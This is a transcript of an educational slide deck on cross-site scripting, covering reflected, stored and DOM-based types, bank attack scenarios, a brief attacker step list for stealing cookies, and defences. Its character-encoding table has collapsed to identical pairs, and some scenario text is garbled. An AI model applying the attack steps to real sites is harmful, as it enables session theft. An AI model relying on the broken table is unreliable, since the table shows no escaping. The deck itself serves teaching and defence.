cross site scripting
TRANSCRIPT
Cross-Site Scripting
(XSS)
Mattash Ali
What is a XSS Attack? XSS Attack is a potentially dangerous security vulnerability found in web-
based applications It allows a variety of code to be injected by a malicious user into a
webpage XSS is very easy to execute and very long and arduous to repair
Takes about 52 days to fix an XSS holes 10-25 XSS holes are found in commercial products every month
During an attack “everything looks fine” to the end user, but in actuality they are subject to an endless amount of threats
XSS Attacks Used For:
Hijacking Accounts False Advertising & inserting hostile content Cookie theft/poisoning & defacing websites Changing of users settings Conducting phishing attacks
Types of XSS Attacks
Non-Persistent (Reflected)
Most common type With invalidated user-supplied data in a resulting webpage
without html encoding, client-side code can be injected into the dynamic page
An attacker convinces a user to follow a malicious URL which injects code into the resulting page
Now the attacker has full access to that pages content
Attack Scenario of Non-Persistent The user comes in contact with a malicious
link, form, or a malicious redirection. The Web application is requested prepared
the call by the Bank. The XSS-code is an XSS vulnerability of
the banking application, inserted into the page.
The infected page with XSS code is sent to the user.
The XSS-code context of the page arrived at the user and thus bypassing the "Same Origin" security setting of the Web browser.
XSS-code sends stolen data to the server of the attacker.
Methodology Lets look into how this works with a simple example of a search feature on
website.
The HTML browser is processing looks like this:
Methodology (contd.) By replacing foobar with the following JavaScript, an attacker can collect cookies
Customer’s web browser will be instructed to redirect itself to the hacker’s website
Methodology (contd.) Non-Persistent Reflection Point which demand the use of a 3rd party to exploit it.
Imagine an e-mail like this being sent to customers:
The email doesn't show the full URL, hiding the malicious code at the very end.
Types of XSS Attacks (contd.)
Persistent (Stored ) Allows the most powerful kinds of attacks First data is stored in a server provided by a web
application It is later shown to a user on a webpage without any html
encoding Ex: Online message board that allows users to post messages for
other users to read With this method, malicious scripts can be provided more
then once An attack can affect a large amount of users and the
application can also be infected by a XSS Virus or Worm
Attack Scenario of Persistent The Web application of the bank is called
with the XSS code. The malicious code enters into an XSS
vulnerability in the application and is stored there.
A user calls the Web application of the Bank. The malicious code is installed from the
memory to the website. The infected Web page is sent to the user. The XSS code context of the page arrived at
the user, and thus bypassing the "Same Origin" security setting of the Web browser.
The XSS code sends stolen data to the server of the attacker.
Methodology Step A) On the product.php?id=1 page users see the product along with
customer comments
Step B) On product_review.php?id=1a hacker leaves a review with malicious code
Methodology (contd.) Step C) They receive a thank you
Step D) You will notice that their attack does not show up immediately, but if you return to products.php?id=1, the new comment is displayed.
Methodology (contd.) The HTML browser would process includes the malicious code hidden in the
source :
Types of XSS Attacks (contd.)
DOM-Based (Local) Document Object Model
Standard object model for representing html or xhtml
Problem exists within the page’s client side script If an attacker hosts a malicious site, which contains a
vulnerable website on a clients local system, a script can be injected
Now the attacker can run the privileges of that users browser on their system.
Attack Scenario of DOM-BASED
The Web application is requested by the Bank prepared the call.
The XSS-code inserted in the cookie. The cookie with the malicious code is
sent to the user and stored with him. The user calls the Web application of
the Bank. The malicious code is installed from
the cookie in the Web page. The infected Web page is sent to the
user. The XSS code sends stolen data to the
server of the attacker.
Steps to an XSS Attack
Select a target Find an XSS hole, and look if it has any cookies If it has a cookie, then you have found a target
Testing Insert code or script pointing to the vulnerability Make sure the page does not appear broken
XSS Execution Send your crafted URL to launch it More experienced attackers would do a few redirects to steal
cookies, return to site, then attack them harder Decide what to do with the data
After collecting data, it is possible to perform an attack
Existing Methods To solve XSS problems
A. Dynamic Approach
1) Vulnerability Analysis based Approach:
It track untrusted data at the character level.
2) Attack Prevention Approach:
A web proxy protects against transferring informations.
B. Static Analysis
2) String Analysis.
3) Preventing XSS Using Untrusted Scripts.
4) Software Testing Techniques (black-box testing)
Existing Methods To solve XSS problems
C. Static and Dynamic Analysis Combination Lattice-based Analysis (white-box testing)
The Web SSARI is a tool, combination of static and runtime features that apply static taint propagation analysis to find security vulnerabilities.
How to Protect Against XSS
< = < ( = ( “ = " # = # % = % + = +
> = > ) = ) ‘ = ' & = & ; = ; - = -
Never trust Input & Always filter meta-characters View material only from official websites
It will eliminate almost 90% of problems
Be cautious when reading emails, discussion boards, posts, etc.
Turn off JavaScript in browser settings In IE, turn security settings on high Custom tag Libraries
Conclusion
XSS is defined as the number one and utmost prevalent website vulnerability on the internet
No one is ever completely safe from XSS Can not be expected to write flawless code or have round
the clock personnel to answer all possible vulnerability issues
As XSS vulnerabilities continue to grow, the best way to protect yourself from it is to be careful and be aware of its existence
References http://en.wikipedia.org/wiki/Cross-site_scripting http://www.cgisecurity.com/articles/xss-faq.shtml http://www.owasp.org/index.php/Top_10_2007-A1 http://ha.ckers.org/xss.html Bernard Menezes , Network Security and Cryptography , Cengage learning, 2010 Modern web attacks, Fraser Howard, SophosLabs UK, August 2007. “Cross Site Scripting” [online] Available: http://www.cgisecurity.com/xss-faq.html “HTTP Header Injection” [online] Available: http://blogs.msdn.com/b/esiu/archive/2007/09/22/http-header- injection-vulnerabilities.aspx HTTP Response Splitting”[online]Available: http://www.owasp.org/index.php/HTTP_Response_Splitting http://www.xssed.com/article/6/Paper_Kr3ws_Cross-Site_Scripting_Tutorial/ http://shiflett.org/articles/foiling-cross-site-attacks
Picture References http://www.midmarket.eweek.com/images/stories/Slideshows/top_website_vulnerabilities/vulnerable02.jpg http://talks.php.net/presentations/slides/php-under-attack/xss.png http://images.google.com/imgres?imgurl=http://www.timelessprototype.com/tpdc/blog/image.axd%3Fpicture%3DCross%2BEyed%2BScripting%2B
Bug.png&imgrefurl=http://www.timelessprototype.com/tpdc/blog/%3Ftag%3D/etiquette&usg=__7A8nC-4J6Jd1heOY4HEg1bo4YRQ=&h=592&w=709&sz=292&hl=en&start=60&tbnid=bytIySB5LrMoKM:&tbnh=117&tbnw=140&prev=/images%3Fq%3Dcross-site%2Bscripting%26start%3D40%26gbv%3D2%26ndsp%3D20%26hl%3Den%26sa%3DN
http://images.google.com/imgres?imgurl=http://bp2.blogger.com/_17vaN5T6Cbw/SEx5xbTHiHI/AAAAAAAAAOE/2xtRR9cT2Jo/s200/NoScript.png&imgrefurl=http://www.infopowered.blogspot.com/&usg=__rjX_EUzPz0y8_teWb818RzD8cCs=&h=200&w=200&sz=37&hl=en&start=225&tbnid=5ULzggLJ0pPHmM:&tbnh=104&tbnw=104&prev=/images%3Fq%3Dcross-site%2Bscripting%26start%3D220%26gbv%3D2%26ndsp%3D20%26hl%3Den%26sa%3DN
http://images.google.com/imgres?imgurl=http://i.haymarket.net.au/utils/sc/ImageResizer.ashx%3Fn%3Dhttp://backoffice.ajb.com.au%252Fimages%252Fnews%252Fphishingmoney.jpg%26w%3D218&imgrefurl=http://www.securecomputing.net.au/News/93871,yahoo-and-ebay-hook-up-on-phisher-blocker.aspx&usg=__9kqYJaZ4d7WxWMuzvcv_VENQy6Q=&h=329&w=218&sz=19&hl=en&start=299&tbnid=0A-rLlxgIugEqM:&tbnh=119&tbnw=79&prev=/images%3Fq%3Dcross-site%2Bscripting%26start%3D280%26gbv%3D2%26ndsp%3D20%26hl%3Den%26sa%3DN
THANK YOU!
Beware of the XSS Mosquito!